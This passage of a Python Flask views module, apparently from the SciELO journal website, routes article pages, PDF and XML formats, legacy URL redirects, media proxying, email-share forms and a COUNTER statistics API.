return current_app.config["SSM_BASE_URI"] + url
@main.route('/article/<string:url_seg>/<string:url_seg_issue>/<string:url_seg_article>/')
@main.route('/article/<string:url_seg>/<string:url_seg_issue>/<string:url_seg_article>/<regex("(?:\w{2})"):lang_code>/')
@main.route('/article/<string:url_seg>/<string:url_seg_issue>/<regex("(.*)"):url_seg_article>/')
@main.route('/article/<string:url_seg>/<string:url_seg_issue>/<regex("(.*)"):url_seg_article>/<regex("(?:\w{2})"):lang_code>/')
@cache.cached(key_prefix=cache_key_with_lang)
def article_detail(url_seg, url_seg_issue, url_seg_article, lang_code=''):
issue = controllers.get_issue_by_url_seg(url_seg, url_seg_issue)
if not issue:
abort(404, _('Issue não encontrado'))
article = controllers.get_article_by_issue_article_seg(issue.iid, url_seg_article)
if article is None:
article = controllers.get_article_by_aop_url_segs(
issue.journal, url_seg_issue, url_seg_article
)
if article is None:
abort(404, _('Artigo não encontrado'))
req_params = {
"url_seg": article.journal.acronym,
"article_pid_v3": article.aid,
}
if lang_code:
req_params["lang"] = lang_code
return redirect(url_for('main.article_detail_v3', **req_params))
@main.route('/j/<string:url_seg>/a/<string:article_pid_v3>/')
@main.route('/j/<string:url_seg>/a/<string:article_pid_v3>/<string:part>/')
@cache.cached(key_prefix=cache_key_with_lang)
def article_detail_v3(url_seg, article_pid_v3, part=None):
qs_lang = request.args.get('lang', type=str) or None
qs_goto = request.args.get('goto', type=str) or None
qs_stop = request.args.get('stop', type=str) or None
qs_format = request.args.get('format', 'html', type=str)
gs_abstract = (part == "abstract")
if part and not gs_abstract:
abort(404,
_("Não existe '{}'. No seu lugar use '{}'"
).format(part, 'abstract'))
try:
qs_lang, article = controllers.get_article(
article_pid_v3, url_seg, qs_lang, gs_abstract, qs_goto)
if qs_goto:
return redirect(
url_for(
'main.article_detail_v3',
url_seg=url_seg,
article_pid_v3=article.aid,
part=part,
format=qs_format,
lang=qs_lang,
stop=getattr(article, 'stop', None),
),
code=301
)
except (controllers.PreviousOrNextArticleNotFoundError) as e:
if gs_abstract:
abort(404, _('Resumo inexistente'))
abort(404, _('Artigo inexistente'))
except (controllers.ArticleNotFoundError,
controllers.ArticleJournalNotFoundError):
abort(404, _('Artigo não encontrado'))
except controllers.ArticleLangNotFoundError:
return redirect(
url_for(
'main.article_detail_v3',
url_seg=url_seg,
article_pid_v3=article_pid_v3,
format=qs_format,
),
code=301
)
except controllers.ArticleAbstractNotFoundError:
abort(404, _('Recurso não encontrado'))
except controllers.ArticleIsNotPublishedError as e:
abort(404, "{}{}".format(ARTICLE_UNPUBLISH, e))
except controllers.IssueIsNotPublishedError as e:
abort(404, "{}{}".format(ISSUE_UNPUBLISH, e))
except controllers.JournalIsNotPublishedError as e:
abort(404, "{}{}".format(JOURNAL_UNPUBLISH, e))
except ValueError as e:
abort(404, str(e))
def _handle_html():
citation_pdf_url = None
for pdf_data in article.pdfs:
if pdf_data.get("lang") == qs_lang:
citation_pdf_url = url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article_pid_v3,
lang=qs_lang,
format="pdf",
)
break
website = request.url
if website:
parsed_url = urlparse(request.url)
if current_app.config["FORCE_USE_HTTPS_GOOGLE_TAGS"]:
website = "{}://{}".format('https', parsed_url.netloc)
else:
website = "{}://{}".format(parsed_url.scheme, parsed_url.netloc)
if citation_pdf_url:
citation_pdf_url = "{}{}".format(website, citation_pdf_url)
try:
html, text_languages = render_html(article, qs_lang, gs_abstract)
except (ValueError, NonRetryableError):
abort(404, _('HTML do Artigo não encontrado ou indisponível'))
except RetryableError:
abort(500, _('Erro inesperado'))
text_versions = sorted(
[
(
lang,
display_original_lang_name(lang),
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article_pid_v3,
lang=lang
)
)
for lang in text_languages
]
)
citation_xml_url = "{}{}".format(
website,
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article_pid_v3,
format="xml",
lang=article.original_language,
)
)
context = {
'next_article': qs_stop != 'next',
'previous_article': qs_stop != 'previous',
'article': article,
'journal': article.journal,
'issue': article.issue,
'html': html,
'citation_pdf_url': citation_pdf_url,
'citation_xml_url': citation_xml_url,
'article_lang': qs_lang,
'text_versions': text_versions,
'related_links': controllers.related_links(article),
'gs_abstract': gs_abstract,
'part': part,
}
return render_template("article/detail.html", **context)
def _handle_pdf():
if not article.pdfs:
abort(404, _('PDF do Artigo não encontrado'))
pdf_info = [pdf for pdf in article.pdfs if pdf['lang'] == qs_lang]
if len(pdf_info) != 1:
abort(404, _('PDF do Artigo não encontrado'))
try:
pdf_url = pdf_info[0]['url']
except (IndexError, KeyError, ValueError, TypeError):
abort(404, _('PDF do Artigo não encontrado'))
if pdf_url:
return get_pdf_content(pdf_url)
raise abort(404, _('Recurso do Artigo não encontrado. Caminho inválido!'))
def _handle_xml():
if current_app.config["SSM_XML_URL_REWRITE"]:
result = fetch_data(use_ssm_url(article.xml))
else:
result = fetch_data(article.xml)
response = make_response(result)
response.headers['Content-Type'] = 'application/xml'
return response
if 'html' == qs_format:
return _handle_html()
elif 'pdf' == qs_format:
return _handle_pdf()
elif 'xml' == qs_format:
return _handle_xml()
else:
abort(400, _('Formato não suportado'))
@main.route('/readcube/epdf/')
@main.route('/readcube/epdf.php')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def article_epdf():
doi = request.args.get('doi', None, type=str)
pid = request.args.get('pid', None, type=str)
pdf_path = request.args.get('pdf_path', None, type=str)
lang = request.args.get('lang', None, type=str)
if not all([doi, pid, pdf_path, lang]):
abort(400, _('Parâmetros insuficientes para obter o EPDF do artigo'))
else:
context = {
'doi': doi,
'pid': pid,
'pdf_path': pdf_path,
'lang': lang,
}
return render_template("article/epdf.html", **context)
def get_pdf_content(url):
logger.debug("Get PDF: %s", url)
if current_app.config["SSM_ARTICLE_ASSETS_OR_RENDITIONS_URL_REWRITE"]:
url = use_ssm_url(url)
try:
response = fetch_data(url)
except NonRetryableError:
abort(404, _('PDF não encontrado'))
except RetryableError:
abort(500, _('Erro inesperado'))
else:
mimetype, __ = mimetypes.guess_type(url)
return Response(response, mimetype=mimetype)
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def get_content_from_ssm(resource_ssm_media_path):
resource_ssm_full_url = current_app.config['SSM_BASE_URI'] + resource_ssm_media_path
url = resource_ssm_full_url.strip()
mimetype, __ = mimetypes.guess_type(url)
try:
ssm_response = fetch_data(url)
except NonRetryableError:
abort(404, _('Recurso não encontrado'))
except RetryableError:
abort(500, _('Erro inesperado'))
else:
return Response(ssm_response, mimetype=mimetype)
@main.route('/media/assets/<regex("(.*)"):relative_media_path>')
@cache.cached(key_prefix=cache_key_with_lang)
def media_assets_proxy(relative_media_path):
resource_ssm_path = '{ssm_media_path}{resource_path}'.format(
ssm_media_path=current_app.config['SSM_MEDIA_PATH'],
resource_path=relative_media_path)
return get_content_from_ssm(resource_ssm_path)
@main.route('/article/ssm/content/raw/')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def article_ssm_content_raw():
resource_ssm_path = request.args.get('resource_ssm_path', None)
if not resource_ssm_path:
raise abort(404, _('Recurso do Artigo não encontrado. Caminho inválido!'))
else:
return get_content_from_ssm(resource_ssm_path)
@main.route('/pdf/<string:url_seg>/<string:url_seg_issue>/<string:url_seg_article>')
@main.route('/pdf/<string:url_seg>/<string:url_seg_issue>/<string:url_seg_article>/<regex("(?:\w{2})"):lang_code>')
@main.route('/pdf/<string:url_seg>/<string:url_seg_issue>/<regex("(.*)"):url_seg_article>')
@main.route('/pdf/<string:url_seg>/<string:url_seg_issue>/<regex("(.*)"):url_seg_article>/<regex("(?:\w{2})"):lang_code>')
@cache.cached(key_prefix=cache_key_with_lang)
def article_detail_pdf(url_seg, url_seg_issue, url_seg_article, lang_code=''):
"""
Expected patterns:
`/pdf/csc/2021.v26suppl1/2557-2558`
`/pdf/csc/2021.v26suppl1/2557-2558/en`
"""
if not lang_code and "." not in url_seg_issue:
return router_legacy_pdf(url_seg, url_seg_issue, url_seg_article)
issue = controllers.get_issue_by_url_seg(url_seg, url_seg_issue)
if not issue:
abort(404, _('Issue não encontrado'))
article = controllers.get_article_by_issue_article_seg(issue.iid, url_seg_article)
if not article:
abort(404, _('Artigo não encontrado'))
req_params = {
'url_seg': article.journal.url_segment,
'article_pid_v3': article.aid,
'format': 'pdf',
}
if lang_code:
req_params['lang'] = lang_code
return redirect(url_for('main.article_detail_v3', **req_params), code=301)
@main.route('/pdf/<string:journal_acron>/<string:issue_info>/<string:pdf_filename>.pdf')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def router_legacy_pdf(journal_acron, issue_info, pdf_filename):
pdf_filename = '%s.pdf' % pdf_filename
journal = controllers.get_journal_by_url_seg(journal_acron)
if not journal:
abort(404, _('Este PDF não existe em http://www.scielo.br. Consulte http://search.scielo.org'))
article = controllers.get_article_by_pdf_filename(
journal_acron, issue_info, pdf_filename)
if not article:
abort(404, _('PDF do artigo não foi encontrado'))
return redirect(
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article.aid,
format='pdf',
lang=article._pdf_lang,
),
code=301
)
@main.route('/cgi-bin/fbpe/<string:text_or_abstract>/')
@cache.cached(key_prefix=cache_key_with_lang_with_qs)
def router_legacy_article(text_or_abstract):
pid = request.args.get('pid', None)
lng = request.args.get('lng', None)
if not (text_or_abstract in ['fbtext', 'fbabs'] and pid):
# invalid script name or missing pid
abort(400, _('Requisição inválida ao tentar acessar o artigo com pid: %s' % pid))
article = controllers.get_article_by_pid_v1(pid)
if not article:
abort(404, _('Artigo não encontrado'))
return redirect(
url_for(
'main.article_detail_v3',
url_seg=article.journal.url_segment,
article_pid_v3=article.aid,
),
code=301
)
# ###############################E-mail share##################################
@main.route("/email_share_ajax/", methods=['POST'])
def email_share_ajax():
if not request.is_xhr:
abort(400, _('Requisição inválida.'))
form = forms.EmailShareForm(request.form)
if form.validate():
recipients = [email.strip() for email in form.data['recipients'].split(';') if email.strip() != '']
sent, message = controllers.send_email_share(form.data['your_email'],
recipients,
form.data['share_url'],
form.data['subject'],
form.data['comment'])
return jsonify({'sent': sent, 'message': str(message),
'fields': [key for key in form.data.keys()]})
else:
return jsonify({'sent': False, 'message': form.errors,
'fields': [key for key in form.data.keys()]})
@main.route("/form_mail/", methods=['GET'])
def email_form():
context = {'url': request.args.get('url')}
return render_template("email/email_form.html", **context)
@main.route("/email_error_ajax/", methods=['POST'])
def email_error_ajax():
if not request.is_xhr:
abort(400, _('Requisição inválida.'))
form = forms.ErrorForm(request.form)
if form.validate():
recipients = [email.strip() for email in current_app.config.get('EMAIL_ACCOUNTS_RECEIVE_ERRORS') if email.strip() != '']
sent, message = controllers.send_email_error(form.data['name'],
form.data['your_email'],
recipients,
form.data['url'],
form.data['error_type'],
form.data['message'],
form.data['page_title'])
return jsonify({'sent': sent, 'message': str(message),
'fields': [key for key in form.data.keys()]})
else:
return jsonify({'sent': False, 'message': form.errors,
'fields': [key for key in form.data.keys()]})
@main.route("/error_mail/", methods=['GET'])
def error_form():
context = {'url': request.args.get('url')}
return render_template("includes/error_form.html", **context)
# ###############################Others########################################
@main.route("/media/<path:filename>/", methods=['GET'])
@cache.cached(key_prefix=cache_key_with_lang)
def download_file_by_filename(filename):
media_root = current_app.config['MEDIA_ROOT']
return send_from_directory(media_root, filename)
@main.route("/img/scielo.gif", methods=['GET'])
def full_text_image():
return send_from_directory('static', 'img/full_text_scielo_img.gif')
@main.route("/robots.txt", methods=['GET'])
def get_robots_txt_file():
return send_from_directory('static', 'robots.txt')
@main.route("/revistas/<path:journal_seg>/<string:page>.htm", methods=['GET'])
def router_legacy_info_pages(journal_seg, page):
"""
Essa view function realiza o redirecionamento das URLs antigas para as novas URLs.
Mantém um dicionário como uma tabela relacionamento entre o nome das páginas que pode ser:
Página âncora
[iaboutj.htm, eaboutj.htm, paboutj.htm] -> #about
[iedboard.htm, eedboard.htm, pedboard.htm] -> #editors
[iinstruc.htm einstruc.htm, pinstruc.htm]-> #instructions
isubscrp.htm -> Sem âncora
"""
page_anchor = {
'iaboutj': '#about',
'eaboutj': '#about',
'paboutj': '#about',
'eedboard': '#editors',
'iedboard': '#editors',
'pedboard': '#editors',
'iinstruc': '#instructions',
'pinstruc': '#instructions',
'einstruc': '#instructions'
}
return redirect('%s%s' % (url_for('main.about_journal',
url_seg=journal_seg), page_anchor.get(page, '')), code=301)
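# Illustrative sketch (not part of the original code): a legacy request such as
#     GET /revistas/<journal_seg>/iaboutj.htm
# is answered with a 301 redirect to url_for('main.about_journal',
# url_seg=<journal_seg>) plus the '#about' anchor; page names missing from
# page_anchor (e.g. isubscrp) redirect to the same page without an anchor.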
@main.route("/api/v1/counter_dict", methods=['GET'])
def router_counter_dicts():
"""
Essa view function retorna um dicionário, em formato JSON, que mapeia PIDs a insumos
necessários para o funcionamento das aplicações Matomo & COUNTER & SUSHI.
"""
end_date = request.args.get('end_date', '', type=str)
try:
end_date = datetime.strptime(end_date, '%Y-%m-%d')
except ValueError:
end_date = datetime.now()
begin_date = end_date - timedelta(days=30)
page = request.args.get('page', type=int)
if not page:
page = 1
limit = request.args.get('limit', type=int)
if not limit or limit > 100 or limit < 0:
limit = 100
results = {'dictionary_date': end_date,
'end_date': end_date.strftime('%Y-%m-%d %H-%M-%S'),
'begin_date': begin_date.strftime('%Y-%m-%d %H-%M-%S'),
'documents': {},
'collection': current_app.config['OPAC_COLLECTION']}
articles = controllers.get_articles_by_date_range(begin_date, end_date, page, limit)
for a in articles.items:
results['documents'].update(get_article_counter_data(a))
results['total'] = articles.total
results['pages'] = articles.pages
results['limit'] = articles.per_page
results['page'] = articles.page
return jsonify(results)
def get_article_counter_data(article):
return {
article.aid: {
"journal_acronym": article.journal.acronym,
"pid": article.pid if article.pid else '',
"aop_pid": article.aop_pid if article.aop_pid else '',
"pid_v1": article.scielo_pids.get('v1', ''),
"pid_v2": article.scielo_pids.get('v2', ''),
"pid_v3": article.scielo_pids.get('v3', ''),
"publication_date": article.publication_date,
"default_language": article.original_language,
"create": article.created,
"update": article.updated
}
}
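# Illustrative sketch (not part of the original code): a request such as
#     GET /api/v1/counter_dict?end_date=2021-06-30&page=1&limit=100
# would return JSON shaped roughly like
#     {"collection": "<OPAC_COLLECTION>",
#      "dictionary_date": "...",
#      "begin_date": "2021-05-31 00-00-00", "end_date": "2021-06-30 00-00-00",
#      "total": <int>, "pages": <int>, "limit": 100, "page": 1,
#      "documents": {"<aid>": {"journal_acronym": "...", "pid": "...",
#                              "pid_v3": "...", "default_language": "...", ...}}}
# The dates and counts are hypothetical; the keys mirror router_counter_dicts()
# and get_article_counter_data() above.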
@main.route('/cgi-bin/wxis.exe/iah/')
def author_production():
# http://www.scielo.br/cgi-bin/wxis.exe/iah/
# ?IsisScript=iah/iah.xis&base=article%5Edlibrary&format=iso.pft&
# lang=p&nextAction=lnk&
# indexSearch=AU&exprSearch=MEIERHOFFER,+LILIAN+KOZSLOWSKI
# ->
# //search.scielo.org/?lang=pt&q=au:MEIERHOFFER,+LILIAN+KOZSLOWSKI
search_url = current_app.config.get('URL_SEARCH')
if not search_url:
abort(404, "URL_SEARCH: {}".format(_('Página não encontrada')))
qs_exprSearch = request.args.get('exprSearch', type=str) or ''
qs_indexSearch = request.args.get('indexSearch', type=str) or ''
qs_lang = request.args.get('lang', type=str) or ''
_lang = IAHX_LANGS.get(qs_lang) or ''
_lang = _lang and "lang={}".format(_lang)
_expr = "{}{}".format(
qs_indexSearch == "AU" and "au:" or '', qs_exprSearch)
_expr = _expr and "q={}".format(_expr.replace(" ", "+"))
_and = _lang and _expr and "&" or ''
_question_mark = (_lang or _expr) and "?" or ""
if search_url.startswith("//"):
protocol = "https:"
elif search_url.startswith("http"):
protocol = ""
else:
protocol = "https://"
url = "{}{}{}{}{}{}".format(
protocol, search_url, _question_mark, _lang, _and, _expr)
return redirect(url, code=301)
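# Illustrative sketch (not part of the original code): with URL_SEARCH set to
# "//search.scielo.org/" and IAHX_LANGS mapping 'p' to 'pt', a legacy request such as
#     GET /cgi-bin/wxis.exe/iah/?indexSearch=AU&exprSearch=MEIERHOFFER,+LILIAN+KOZSLOWSKI&lang=p
# is redirected (301) to
#     https://search.scielo.org/?lang=pt&q=au:MEIERHOFFER,+LILIAN+KOZSLOWSKI
# matching the mapping sketched in the comment at the top of author_production().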